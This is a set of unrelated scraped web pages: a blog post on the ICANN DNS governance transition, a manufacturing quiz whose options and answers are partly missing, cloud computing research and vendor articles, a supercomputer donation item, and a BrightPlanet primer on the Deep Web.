I’m sorry to put here something that is not really technical but for a blog with the name “howdoesinternetwork.com” it would be strange not to follow the story about the future of DNS governance given the fact that DNS is a crucial part of internet functionality. You probably know how the internet works given the fact that you are visiting a blog like this. Regardless of that, it will not hurt to explain in few words the importance of DNS (Domain Name System) for a normal internet operation. Let’s surf to se how this works If you want to open this webpage or send an email to someone, you must enter a destination to your computer so it could know where to sent your stuff. As you are most surely a human, being, you would like to use a name like google.com for opening a webpage or an e-mail address in order to send a message to your colleagues (rather than some strange numbers separated by dots or colons). Almost all humans are like that and they want to use names and addresses. Computers, on the other hand, know to reach each other only by IP addresses. You can see that we needed someone to take the role of the “address book” as soon as we got the internet. We can say that U.S. government basically invented the internet so they also decided who will manage it. ICANN was born to run the process of matching domain names with IP addresses around the internet. It became the authority supervising the root of DNS making sure domains are registered to right IP addresses and safe from unwanted change. They do some other stuff too, but this is, let’s say, the most important one for the internet to work properly. So what’s happening? In October 2016 ICANN (Internet Corporation for Assigned Names and Numbers) started the transition from being managed primarily by U.S government towards Multistakeholder Community. ICANN’s contract with US NTIA (National Telecommunications and Information Administration’s) expired on October 1th and US government decided that it is time to let it go without a “renewal”. In the months preceding October 2016 there was a lot of work going on at ICANN when it comes to building a good proposal of the future DNS governance model that would include private-sector and independent entities including business, academics, technical experts, civil society, governments and many others. And as it look like in this moment, they did it. The idea is to let ICANN work without the last word of American government over the actions ICANN should take. This should be a better way of making the Internet future bright and to leave it free, open and accessible as the Internet we know today. The result of this contract expiring and US government exit from managing ICANN is that now management and coordination of the Internet’s address book is somehow privatised and in the hands of the volunteer-based multistakeholder community. The multistakeholder governance model or multistakeholder initiative defines a governance structure in which all stakeholders are participating together in the discourse, decision making, and implementation of solutions to common problems or goals. Why it could be bad? What was to happen if U.S. postponed the handover for another year or so? Well, not much, all the stories around are mentioning that United Nations may take control and make some extreme changes to the internet. There is always another option mentioned online that there could be a chance for European Union to form their own internet. North Korea already has one like this. But nobody really wants to have a internet that does not cover the whole globe so all this are only stories unlikely to happen. Having more parties around the world is more fair way to run ICANN. Some real issues that can arise with multistakeholder way of running it are issues with transparency and corruption. Transparency should always be protected and publicly available databases listing owners of domains should not be removed or edited separately. It seems to me that management of those databases is not fully defined in the new model. It must be said that they are crucial and often the only way of fighting infringement and cybersecurity fraud online. Corruption is a huge problem in some organisations with similar structure, I hope they made a plan that will make corruption less likely in this case. Why is that good? Some of the politicians think that this handover would let governments like China, Iran or Russia to have greater control over the content availability. It seems that they are getting this wrong and the opposite is more likely to be true. America created the internet and the ICANN. At that time, they decided to keep the right to control changes being made in the internet’s master list of addresses. They also decided that they will eventually pull back when ICANN proves its ability to be government independent. They are now just keeping the promise. Most of net users nowadays live in India and China, not America, as when ICANN was created. Most of the internet traffic doesn’t even pass through U.S. anymore. After the Snowden revelation about spying and stuff, the pressure grew for America to hand over the control to an independent body. U.S. government in 2014 rightly decided to start the transition and make ICANN independent but, in the same time, impervious to power grabs by other governments or commercial interests. ICANN implement some reforms in 2016 an the time has come to hand over the wheel. The whole idea around the internet is to make it global and available everywhere. Huge national firewalls and strange rules forcing some types of data to be stored within a particular country did not help to make the internet the way it should be. Some of the countries like Russia or China will keep filtering and policing their own geographical parts of the internet. America leaving the oversight role at ICANN will send a strong message to other countries that no government should have a say in how the internet is run. It will also remove other countries urge to become equal to the U.S. in managing the ICANN processes. So this is a good thing. When you take all this together, now is the best time to finally make this transition, no matter who will be chosen as Obama’s successor, it is hard for me to think that it will know anything about how the internet works.
<urn:uuid:fcc19d12-ea59-43b2-88fa-5e0def5675c0>
CC-MAIN-2017-04
https://howdoesinternetwork.com/2016/icann-and-dns
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00272-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955357
1,318
2.9375
3
Manufacturing Industry - Quiz Questions and Answers Here is a collection of 35 multiple-choice quiz questions related to manufacturing industries. The answers of these questions are given at the end of this page. Manufacturing Industries Quiz Questions Question 1: Where was the first cotton mill of India was established in 1857? Question 2: Which coutry is the largest producer of Jute products? - Sri Lanka Question 3: Iron and Steel industry is a: - an agro-based industry - a chemical industry - basic industry - tertiary industry Question 4: Durgapur is situated in which state - Madhya Pradesh - West Bengal Question 5: Chemical industries are usually located near: - iron and steel industries - thermal power plants - oil refineries - automobile industries Question 6: STP stands for: - system tech park - software technology park - state technical park - steel technology park Question 7: NTPC has full form: - national textile production corporation - national technical power corporation - national thermal power corporation - national telecommunication processing company Question 8: Atomic power plant causes - water pollution - noise pollution - air pollution - heat pollution Question 9: Manufacturing industries includes: - crop production - fish production - sugar production Question 10: Which of the following is an appropriate definition for manufacturing? - manufacturing of services. - production of goods in large scale after processing of raw materials to make a valuable and useful product. - production of goods out of natural materials. - production of goods with services. Question 11: Chose the right answer: - agriculture and industry go hand by hand. - agriculture and industry are never dependent on each other. - industry has nothing to do with agriculture. - both agriculture and industry fall under service sectors. Question 12: Which of the following is a factor of factory location? - political situation - least cost Question 13: How do we classify the industries on the basis of their raw materials? - agro based and mineral based - small scale and large scale - basic and consumer industry - primary and secondary. Question 14: How do we classify the industries on the basis of ownership? - government owned and individual owned - small scale and large scale - public, private, joint and co-operative - primary, secondary and tertiary Question 15: Which of the following is wrongly matched? private sector: RIL agro-based industry: sugar - key industry: iron and steel industry: iron and steel > - basic industry: sugar industry: sugar > Question 16: Most of the sugar industry of Maharashtra are: - private sector - public sector - co-operative sector - joint sector Question 17: Salem iron and steel plant is in which state? - Tamil Nadu Question 18: What is the full form of SAIL? - Steel Authority of India Limited - Steel and Iron Limited - Steel Authority of India - None of these Question 19: Which of these is responsible for marketing of the products of public sector steel plants? - Tata Steel Question 20: Which of these countries is the largest producer of iron and steel? Question 21: Which of the following regions in India have maximum concentration of iron and steel plants? - Gujarat and Maharashtra - Chhota Nagpur Plateau - Deccan Plateau - Northern states Question 22: After iron and steel which is the second most important metallurgical industry in India? - base metals Question 23: Manufacturing industries include: - Converting raw materials into ready to use goods - transporting raw material - producing raw material - procuring raw material Question 24: Choose odd one: Question 25: Which is not a factor in deciding the location of an industry: - none of these Question 26: Which of the following does not affect the location of industries: - per capita income - raw material Question 27: Rubber, tea, coffee are: - basic industries - heavy industries - agro-based industries - public sector industries Question 28: Cement is: - basic industry - heavy industry - light industry - building industry Question 29: Golden fiber is: Question 30: Which of the following are two prime factors for location of aluminium industry?(i) Regular power supply (ii) Assured source of raw material at minimum cost (iii) Research and development facility (iv) Cheap labour - (i) and (ii) - (ii) and (iii) - (iii) and (iv) - (i) and (iv) Question 31: Which of the following is an organic chemical? - sulphuric acid Question 32: In which of these states is the Hazira fertilizer plant located? Question 33: Which of the following state is the largest producer of cement? Question 34: The main markets for Indian jute textile are: - USA, Canada, Russia, United Arab Republic, UK, Australia - USA, Pakistan, Brazil, Canada - USA, Egypt, Japan - Egypt, Japan, Bangladesh Question 35: Which of the following industry is a seasonal-type industry? - sugar industry - jute industry - cotton textile - iron and steel Industry Quiz Answers This list is based on the content of the title and/or content of the article displayed above which makes them more relevant and more likely to be of interest to you. We're glad you have chosen to leave a comment. Please keep in mind that all comments are moderated according to our comment policy, and all links are nofollow. Do not use keywords in the name field. Let's have a personal and meaningful conversation.comments powered by Disqus
<urn:uuid:033bf078-1764-41dd-92d0-9addb13ab5b5>
CC-MAIN-2017-04
http://www.knowledgepublisher.com/article-1021.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00116-ip-10-171-10-70.ec2.internal.warc.gz
en
0.873311
1,233
2.859375
3
This week’s hand-picked assortment focuses on advancements made to improve the performance of scientific applications in the cloud, touching on issues such as fault tolerance, workflow management, and 2D and 3D cellular simulation. Cloud Service Fault Tolerance Cloud computing presents a unique opportunity for science and engineering with benefits compared to traditional high-performance computing, especially for smaller compute jobs and entry-level users to parallel computing. However, according to researchers from RMIT University in Melbourne, doubts remain for production high-performance computing in the cloud, the so-called science cloud, as predictable performance, reliability and therefore costs remain elusive for many applications. Their paper used parameterized architectural patterns to assist with fault tolerance and cost predictions for science clouds, in which a single job typically holds many virtual machines for a long time, communication can involve massive data movements, and buffered streams allow parallel processing to proceed while data transfers are still incomplete. They utilized predictive models, simulation and actual runs to estimate run times with acceptable accuracy for two of the most common architectural patterns for data-intensive scientific computing: MapReduce and Combinational Logic. Run times were fundamental to understand fee-for-service costs of clouds. These are typically charged by the hour and the number of compute nodes or cores used. The researchers evaluated their models using realistic cloud experiments from collaborative physics research projects and showed that proactive and reactive fault tolerance is manageable, predictable and composable, in principle, especially at the architectural level. Cloud Computing and Cellular Automata Simulation Cellular automata can be applied to solve several problems in a variety of areas, such as biology, chemistry, medicine, physics, astronomy, economics, and urban planning. The automata are defined by simple rules that give rise to behavior of great complexity running on very large matrices. 2D applications may require more than 106 × 106 matrix cells, which are usually beyond the computational capacity of local clusters of computers. A paper from Brazilian researchers out of Pontifical Catholic University of Rio de Janeiro and the Federal University of Espirito Santo presented a solution for traditional cellular automata simulations. They proposed a scalable software framework, based on cloud computing technology, which is capable of dealing with very large matrices. The use of the framework facilitated the instrumentation of simulation experiments by non-computer experts, as it removed the burden related to the configuration of MapReduce jobs, so that researchers need only be concerned with their simulation algorithms. Managing Computational Workflows in the Cloud Scientists today are exploring the use of new tools and computing platforms to do their science. They are using workflow management tools to describe and manage complex applications and are evaluating the features and performance of clouds to see if they meet their computational needs, argue researchers out of the USC Information Sciences Institute. Although today, hosting is limited to providing virtual resources and simple services, one can imagine that in the future entire scientific analyses will be hosted for the user. The latter would specify the desired analysis, the timeframe of the computation, and the available budget. Hosted services would then deliver the desired results within the provided constraints. Their paper described current work on managing scientific applications on the cloud, focusing on workflow management and related data management issues. Frequently, applications are not represented by single workflows but rather as sets of related workflow ensembles. Thus, hosted services need to be able to manage entire workflow ensembles, evaluating tradeoffs between completing as many high-value ensemble members as possible and delivering results within a certain time and budget. Their paper gives an overview of existing hosted science issues, presents the current state of the art on resource provisioning that can support it, as well as outlines future research directions in this field. Optimizing Data Analysis in the Cloud A research team out of Duke University presented Cumulon, a system designed to help users rapidly develop and intelligently deploy matrix-based big-data analysis programs in the cloud. Cumulon, according to the research, features a flexible execution model and new operators especially suited for such workloads. In the paper, they show how to implement Cumulon on top of Hadoop/HDFS while avoiding limitations of MapReduce, and demonstrate Cumulon’s performance advantages over existing Hadoop-based systems for statistical data analysis. To support intelligent deployment in the cloud according to time/budget constraints, Cumulon goes beyond database style optimization to make choices automatically on not only physical operators and their parameters, but also hardware provisioning and configuration settings, according to the Duke researchers. They applied a suite of benchmarking, simulation, modeling, and search techniques to support effective cost-based optimization over this rich space of deployment plans. Business Integration as a Service: The Case Study of the University of Southampton Finally, a paper out of the University of Southampton presented Business Integration as a Service (BIaaS) to allow two services to work together in the Cloud to achieve a streamline process. They illustrated this integration using two services; Return on Investment (ROI) Measurement as a Service (RMaaS) and Risk Analysis as a Service (RAaaS) in the case study at the University of Southampton. The case study demonstrated the cost-savings and the risk analysis achieved, so two services can work as a single service. Advanced techniques were used to demonstrate statistical services and 3D Visualisation services under the remit of RMaaS and Monte Carlo Simulation as a Service behind the design of RAaaS. Computational results were presented with their implications discussed. Different types of risks associated with Cloud adoption can be calculated easily, rapidly and accurately with the use of BIaaS. This case study confirmed the benefits of BIaaS adoption, including cost reduction and improvements in efficiency and risk analysis. Implementation of BIaaS in other organisations is also discussed. Important data arising from the integration of RMaaS and RAaaS are useful for management and stakeholders of University of Southampton.
<urn:uuid:59fdc139-5cf8-461d-8951-a42577c403cd>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/07/07/research_roundup_expanding_the_science_cloud/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280763.38/warc/CC-MAIN-20170116095120-00052-ip-10-171-10-70.ec2.internal.warc.gz
en
0.927801
1,237
2.703125
3
Public health, education, high-tech farming and agriculture, seismic data collection, oil exploration and production, clean energy generation and management, transportation, and disaster management are examples of the many industries that require intense computing resources, often in rural America. SMBs in rural areas, just like in the major cities, are becoming increasingly reliant on cloud services as part of their core operations. Collecting, distributing, and updating information is maximized when widespread coverage, reliable connectivity, and proximal computing power are available. Take agribusiness for example: agriculture and food sectors contributed $835 billion to the U.S. gross domestic product, placing this rural business opportunity among the most attractive growth markets in the world! Land and water resourcing, logistics, food security, and precision agriculture are some of the other related applications driving the need for computing “at the edge.” The future of high-tech, agriculture-related industries can only be realized by aggregation of tons of real-time intelligence: from information about soil conditions, location, topology, temperature, water, mineral content, insect populations to supply chain, consumer demand, and commodity pricing. All of this data needs to be processed in real-time, and designed to maximize yields, optimize operations, and manufacture products that go to market at premium prices. While city dwellers speculate about driverless cars, rural America was truly the pioneer in self-driving vehicles. Let’s look at how John Deere, the agricultural equipment manufacturer, has embraced highly flexible and scalable computing at the edge: As a pioneer in the industry of self-driving vehicles, John Deere’s latest tractor and combine systems utilize advanced technologies that include the use of unmanned aerial vehicles to collect real-time topology data. This data is then fed to the agricultural combine via wireless connectivity, helping guide driverless combines as they work in the field to harvest crops. The result is an interactive system of communications, real-time data, and improvements driven by advanced tools and technologies, including the cloud for processing. This is a very powerful example of an “Internet of Things” (IoT) on steroids. However, there is another element at play here–the crunching of data has to be done in real time, and with very little latency. A multi-million dollar John Deere combine cannot drift away into a neighbor’s land, nor can it run into a pond, or go too fast or too slow at the risk of damaging the crops. This is just one example of a technology that requires advanced devices within the equipment, and perhaps more importantly, a way to store the data in a high-performance cloud computing environment at “the edge” so that it’s available with little latency, even in the most remote locations. While there are many other cloud computing use cases for businesses in rural areas, most do not share the same extreme need for low latency as John Deere’s combine systems. Hosting web sites, Software as a Service (SaaS) applications, customer databases, and other related technology are perfectly functional in data centers that may be further away. However, regional IT Consulting companies, value-added resellers (VARs), and rural local exchange carriers (RLECs)/incumbent local exchange carriers (ILECs) need to be able to properly position these hosting options to their customers. Limited options present a major opportunity for regionally-oriented VARs, Resellers, and RLECs/ILECs. Despite the growing need for high-performance computing at the edge, hosting options are limited for businesses in rural markets. Large cloud providers are unable to deliver the low latency computing solutions needed to process data for today’s demanding applications (e.g. video, Voice over IP), offering much less futuristic solutions than what was described in the John Deere combine example. More importantly, large cloud providers don’t offer true managed service to support rural customers due to the shortage of technical resources in rural America. For VARs, and RLECs/ILECs, it will be imperative to offer differentiated cloud products. RLECs and ILECs are in an especially advantageous position to provide transit and hosting to businesses in their markets. Rural customers are not different than those in urban markets–they want powerful computing, reliability, speed, expertise, and options. It’s important to note that it is not as simple as throwing some cloud foundation into a local data center or repurposed Central Office (CO). If a cloud business were to arrive on the scene with the simple notion that it is “enterprise ready,” it would be entirely disconnected with the market’s understanding and acceptance of the service offering. A local cloud solution needs to be part of the national footprint, and cannot be an island. With a clearly defined product, a direct explanation of how it can improve business, as well as right-sized pricing, RLECs and ILECs can demystify cloud computing for customers who wouldn’t have considered it otherwise. Packaging cloud along with hosted voice, video, remote desktop environments, application distribution points, tertiary and DR services, and other applications can improve value for customers who might otherwise purchase these services from over-the-top providers. This keeps the RLECs and ILECs in the revenue chain. Integrating cloud into the product offering To determine the level of service rural telecom and IT providers will offer their customers, it’s important for them to thoughtfully address critical questions: - What kind of businesses are in your service area? - Do you have a major share of your business customers’ IT spend? - Does it make sense to offer multiple hosting services to your customers? - Are you going to host and manage the infrastructure or rely on a partner? - Can your sales team effectively sell these services? Or would they require education and training? - Being in the unique position of having loyal customers, how will you introduce the product to them without disrupting existing business relationships? Cloud computing is as ideal a solution for the rural marketplace as it is for major cities. Regional, and RLEC /ILEC customers have a strong need for these services as business owners in these areas realize that they must compete globally, but at a price point that meets their operational realities. By presenting these cloud computing options, RLECs and ILECs are well positioned to package, price, and sell these services. VARs and RLECs/ILECs require a partner that is willing and able to deliver “the cloud” with an exceptional service experience, highly technical support teams, 100% uptime guarantees, and state-of-the-art data center infrastructure with top-branded servers.
<urn:uuid:fe95a66a-5592-4124-b5f3-8be557e0a2c9>
CC-MAIN-2017-04
http://www.codero.com/blog/bringing-the-cloud-to-all-of-america/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00567-ip-10-171-10-70.ec2.internal.warc.gz
en
0.943474
1,404
2.9375
3
Semantic technologies don't refer to a single technology, but rather to a side variety of tools and technologies that have to do with meaning. Some focus on structure, some on text, and some on intelligence. Understanding what sub-categories are out there can help you determine when to use each. Semantic Web vs. Semantic Technologies—much of the content on this site is about the Semantic Web, but it's only one kind of semantic technology. This lesson outlines the others and how they relate to the Semantic Web. Semantic Search and the Semantic Web—semantic search is an increasingly hot topic, and with the Google Knowledge Graph it has become intimately related to the Semantic Web. NLP and the Semantic Web—natural language process and text analytic technologies can be powerfully combined with Semantic Web technologies.
<urn:uuid:08ec6116-e194-43e3-9573-90539c953ea5>
CC-MAIN-2017-04
http://www.cambridgesemantics.com/semantic-university/comparing-semantic-technologies
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00017-ip-10-171-10-70.ec2.internal.warc.gz
en
0.910924
171
2.765625
3
Centaurus Energy has donated an IBM supercomputer nicknamed “Megalodon” to Nova Southeastern University. Megalodon is an IBM P6 supercomputing cluster composed of 32 nodes that each have 16 POWER CPU’s with 256 GB of RAM. Each CPU contains two processor units and has about 790 million transistors as well. Megalodon is also water-cooled and uses internal chilled plates and a rear-cooling door on each rack. To house the new system, NSU plans on building a brand new, $80 million research facility that will also be home to a team of accomplished researchers. “This new multidisciplinary center will provide our world-class team of researchers with the tools they need to continue to make discoveries that will impact the way we all live,” said NSU President George L. Hanbury, Ph.D. “From developing new cancer treatments to finding new methods for environmental sustainability, the possibilities are endless. What’s interesting is where the donation of that IBM system came from. Why did Centaurus Energy, a partially defunct hedge fund from Houston, Texas, donate a supercomputer to a relatively small Florida university? The facts are still vague but according to a NSU press release, “Following a long standing relationship between NSU and the United States Geological Survey (USGS), including USGS’s current location on NSU’s main campus, it is intended that USGS will occupy the entire first floor of the CCR. The USGS and NSU will partner on collaborative inter-disciplinary research involving greater Everglades restoration efforts, hydrology and water resources, and more.” While we are only making that connection based on the donation’s source, it seemed worthy of pointing out that in addition to other university research, there may be some energy-based angles here that helped drive the donation. The Megalodon supercomputer will be used mainly to assist the school in their research efforts. These efforts include hundreds of projects that deal with cancer treatments to environmental sustainability. In addition to research, students will be able to receive training that will help to prepare them for careers upon graduation. “This supercomputer allows researchers to create more accurate models of complex processes, simulate problems once thought impossible to solve, and analyze increasing amounts of data generated by experiments in weeks or months, rather than the years required by conventional computers,” said Eric S. Ackerman, Ph.D., dean of NSU’s Graduate School of Computer and Information Sciences.
<urn:uuid:1bc3a735-2b74-498a-ada2-211c3411dec9>
CC-MAIN-2017-04
https://www.hpcwire.com/2014/03/05/centaurus-energy-donates-ibm-supercomputer-nsu/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00135-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946536
526
2.875
3
Everything You Wanted to Know About Blockchain What is a Blockchain? The easiest way to understand Blockchain is to think of it as a distributed ledger of transactions or a continually updated list of all transactions. For more information, visit bit.ly/2hJOr1h. How It Works Blockchain is a data structure of linked data blocks. All participants or nodes in the network have a copy of the Blockchain and, when someone wants to add a block, the nodes perform mining. Mining is when the nodes run algorithms to review and validate the transaction. If a majority agree it looks valid, then the transaction is approved and the new block is added to the chain. Several flavors of Blockchains exist. Bitcoin is a public and permission-less version where anyone can take part and add to the chain. However, private or permissioned Blockchains involve nodes which have to be preauthorized to participate. Either way the nodes in the network participate in determining what transactions are valid and, thus, what gets added to the chain. For more information, visit on.wsj.com/1nBCZ6e. Three key things needed for a Blockchain to function are a network of nodes, an agreed upon protocol and a consensus mechanism for mining. The consensus mechanism consists of the rules used to determine how transactions are verified and how the nodes will agree on the current state of the Blockchain. There are multiple consensus algorithms available, depending on whether the chain is a public or private chain and also on how much trust has already been established. The nodes evaluate transactions and, if approved, they get packaged into a block that’s added to the chain, which is then redistributed to all the nodes in the network. This can happen rapidly so many transactions can be processed. Where To Use Blockchain Blockchains can be used for digital banking, compiling data on sales, tracking digital rights usage, tracking payments to content providers, and tracking shipments. Blockchain can be used for smart contracts and decentralized applications such as ride sharing or crowd funding. Blockchains can be used for implementing prediction markets and generic governance tools. They can also be used for digital signatures; tracking and verifying integrity of messages; and automating processes. IBM has published multiple articles on Blockchains (ibm.co/1OhUGnS). They expect Blockchains to be used in the creation of more efficient systems for multiple areas including: internet of things networks, multimedia rights management, government proof of identity insurance record management. Like what you just read? To receive technical tips and articles directly in your inbox twice per month, sign up for the EXTRA e-newsletter here. comments powered by
<urn:uuid:fb4fd8f1-8442-49d4-9311-a65e80c50110>
CC-MAIN-2017-04
http://ibmsystemsmag.com/aix/trends/whatsnew/blockchain/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00347-ip-10-171-10-70.ec2.internal.warc.gz
en
0.898278
547
3.34375
3
Perhaps the most fascinating aircraft ever built and flown was the Lockheed Martin SR-71 Blackbird. Alas, it was taken out of service in the late 90's and there's been nothing quite like it since. Now, much to the delight of aviation enthusiasts, Lockheed has announced the Blackbird's successor; the SR-72. Looking more like a high-tech shark than a bird, the SR-72's predecessor could cruise at Mach 3.2 (2,436 mph) with an 85,000 foot ceiling and a rate of climb just over 2.2 miles per minute! The Lockheed Martin SR-71 Blackbird Developed by Lockheed's legendary Skunkworks division, the SR-71's first flight was in 1964 and after 32 were built and flown in 3,551 mission sorties the program was finally retired in 1998. The SR-71's list of records (such as "Speed Over a Recognized Course" record for flying from New York to London, a distance of 3,508 miles at an average of 1,435.587 mph in 1 hour 54 minutes and 56.4 seconds) is astounding but it's the technical details of how the aircraft operated that are a true geek-out: For example, because of the heat generated by traveling at such high speed, the skin of the aircraft was made of a corrugated titanium alloy so that it could expand without buckling and prior to flight, when the airframe was cold, the gaps in fuel system were large enough that jet fuel leaked out on to the runway! (Check out Flying the SR-71 Blackbird for a great account of actually piloting a Blackbird and out-running rocket-powered missiles). Artist's rendering of the Lockheed Martin SR-72 Combining an "off-the-shelf turbine with a scramjet to power the aircraft from standstill to Mach 6 plus" the "outline plan for the operational vehicle, the SR-72, is a twin-engine unmanned aircraft over 100 ft. long ... about the size of the SR-71 and have the same range, but have twice the speed ... and could be in service by 2030." The SR-71 cost $43 million each back when it was accepted by the US Air Force in 1968. There's no estimate on what the SR-72 will cost but if you're an aviation enthusiast it'll be worth whatever it costs.
<urn:uuid:2f5c505a-db89-4c37-8cfd-427807749bef>
CC-MAIN-2017-04
http://www.networkworld.com/article/2225725/data-center/the-sr-71-blackbird-s-successor---twice-as-fast-.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00163-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965157
494
2.53125
3
The Windows Scheduler Configuration enables you to schedule any program, task, or a script to run at a specified time. You can also schedule a task to run daily, weekly, monthly , etc. The Scheduler Configuration enables you to add, modify tasks from a central point. Provide a name and description for the Scheduler Configuration. You can perform the following actions: Create/Modify a Task To create a new task, select the Create Task tab of the Scheduler Configuration. Select the Modify Task tab to modify an existing task. Specify the following values: Name of the task* The name of the task that has to be created/modified. Overwrite if task already exits Select this option to overwrite the task, if one with the same name exists. This option is only available for create task. The application or the program that has to be run. Click the icon to select and assign a dynamic variable to this parameter. The arguments to run the program, if any. Click the icon to select and assign a dynamic variable to this parameter. The name of the user as whom the task will be run. Click the icon to select and assign a dynamic variable to this parameter, for example, $DomainName\$DomainUserName or $ComputerName\$DomainUserName. The password of the user. Confirm the password again. Perform this task* Specify the time to perform the task. You can select from the following options: - Daily: To run the task daily. Specify the time and duration to run the task. - Weekly: To run the task on specific day(s) in a week. Specify the time, start date, and days on which the task has to be run. - Monthly: To run the task specific day every month(s). You need to specify starting time, select a day and select a month/months. - Once: To run the task only once. You need to specify the date and time. - At System Startup: To run the task when the system is started. - At Logon: To run the task during the user logon. - When Idle: To run the task when the system is idle for the specified time. - Enabled: Select this option to run the task at the specified time. - Run only when logged on: Select this option to run the task only when the user has logged on. Scheduled Task Completed - Delete the task if it is not scheduled to run again: Select this option to delete the task when it is no longer scheduled. - Stop Task: Select this option and specify the duration after which the task will be stopped. Select the required options: - Specify the duration,the system has to be idle before starting a task. - Stop the task if the computer ceases to be idle Select the required options: - Don't start the task if the computer is running on batteries - Stop the task if battery mode begins - Wake the computer to run this task * - denotes mandatory parameters If you wish to create/modify more tasks, click Add More Task button and repeat step 2. The defined task gets added to the Task table. When a wrong password is provided for tasks scheduled in Win2k / WinXP SP1 machines, the tasks will be successfully created, but, fails to execute. Delete a Task To delete a task, select the Create Task tab of the Scheduler Configuration and specify the name of the task that has to be deleted. If you wish to create/modify/delete more tasks, click Add More Task button and repeat step 2. The defined task gets added to the Task table. To modify a task from the Task table, select the appropriate row and click icon and change the required values. To delete a task from the Task table, select the appropriate row and click icon. Using the Defining Targets procedure, define the targets for deploying the Scheduler Configuration. Click the Deploy button to deploy the defined Scheduler Configuration in the defined targets. The scheduler configuration will take effect during the next system startup. To save the configuration as draft, click Save as Draft.
<urn:uuid:71688803-7844-425f-8690-c22554fa9f54>
CC-MAIN-2017-04
https://www.manageengine.com/products/desktop-central/help/computer_configuration/configuring_windows_task_scheduler.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00557-ip-10-171-10-70.ec2.internal.warc.gz
en
0.762287
881
2.515625
3
What is the Deep Web? The Deep Web is a complex concept. It is essentially two categories of data. The first is basically any information that is not easy to obtain through standard searching, which could be Twitter or Facebook posts, links buried many layers down in a dynamic page, or results that sit so far down the standard search results that typical users will never find them. The second category is the larger of the two and represents a vast repository of information that is not accessible to standard search engines. It is comprised of content found in websites, databases, and other sources. Often it is only accessible through a custom query directed at individual websites, which cannot be accomplished by a simple “surface web” search. The Deep Web isn’t found in a single location. It consists of both structured and unstructured content – a huge amount of which is found in databases. This content has often been compiled by experts, researchers, analysts and through automated processing systems at an array of institutions throughout the world. All of the content is housed in different systems, with different structures, at physical locations that can be as far apart as New York and Hong Kong. BrightPlanet has patented the technology to automate custom queries that target thousands of Deep Web sources simultaneously. Our solutions find topic-specific content and provide highly qualified, relevant results for research, analysis, tracking and monitoring – all in real-time – completely automating the process of retrieving Big Data from the Deep Web regardless of how it is stored. How is the Deep Web different from the Surface Web? The Surface Web contains only a fraction of the content available on-line. Standard search engines simply cannot find or retrieve content in the Deep Web. Why? Because many of the Deep Web sources require a direct query to access a database, and standard search engines aren’t built to do that. Standard search engines are the primary means for finding information on the surface Web. These tools (think Google, Yahoo!, and Bing) obtain their results in one of two ways. First, authors may submit their own Web pages for listing directly to the search engine company. Direct listing accounts for a small fraction of surface Web results and means those search tools are often forced to find their own information. Search engines do this by performing a “crawl” or “spider”, following one hypertext link to another. This process takes the pages and puts them into an index that the engine can refer to during future searches. Simply stated, the crawler starts searching for hyperlinks on a page. If that crawler finds one that leads to another document, it records the link and schedules that new page for later crawling. Search engine crawlers extend their indexes further and further from their starting points, like ripples flowing across a pond, in an effort to find everything available. But due to the limitations inherent in crawler searches, they will never find all the content that exists. Thus, to be discovered, “surface” Web pages must be static and linked to other pages. Traditional search engines often cannot “see” or retrieve content in the Deep Web, which includes dynamic content retrieved from a database. How large is the Deep Web? It’s almost impossible to measure the size of the Deep Web. While some early estimates put the size of the Deep Web at 4,000-5,000 times larger than surface web, the changing dynamic of how information is accessed and presented means that the Deep Web is growing exponentially and at a rate that defies quantification. Why haven’t I heard about the Deep Web before? In the earliest days of the Web, there were relatively few documents and sites. It was a manageable task to post all documents as static pages; since results were persistent and constantly available they could easily be crawled by conventional search engines. Now, information is published on the Web in a different way. This is especially true for dynamic content, larger sites or traditional information providers moving their content to the Internet. The sheer volume of these sites requires the information to be managed through automated systems with databases. The contents of these databases are hidden in plain sight from standard search engines since they often require a query to produce results. Some of these sites may have hundreds of pages to navigate through, but thousands of pages that can be searched. Think of a major news site, like CNN.com. You would not be able to follow links from their homepage to find a page from two years ago, but you would be able to search for that page because it is stored and available in their database. The evolution of the Web to a database-centric design has been gradual and largely unnoticed. Many Internet information professionals have noted the importance of searchable databases. But BrightPlanet’s Deep Web white paper is the first to comprehensively define and quantify this category of Web content. Is the Deep Web the same thing as the “invisible” Web? In a word, yes. But “invisible” implies that you’ll never see it. That’s why we prefer “Deep Web” – because the information is there if you have the right technology to find it. As early as 1994, Dr. Jill Ellsworth first coined the phrase “invisible Web” to refer to information that was publicly available, but not being returned by conventional search engines. But that is just a semantic difference that doesn’t address the core issue. The real problem is the spidering and crawling technology used by conventional search engines that returns links based on popularity, not content. But this same Big Data content clearly and readily available if different technology, such as the suite of BrightPlanet solutions, is used to access it.
<urn:uuid:405a4feb-a822-46ac-b15b-0854d3f2545f>
CC-MAIN-2017-04
https://brightplanet.com/2012/06/deep-web-a-primer/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00099-ip-10-171-10-70.ec2.internal.warc.gz
en
0.942531
1,184
2.96875
3
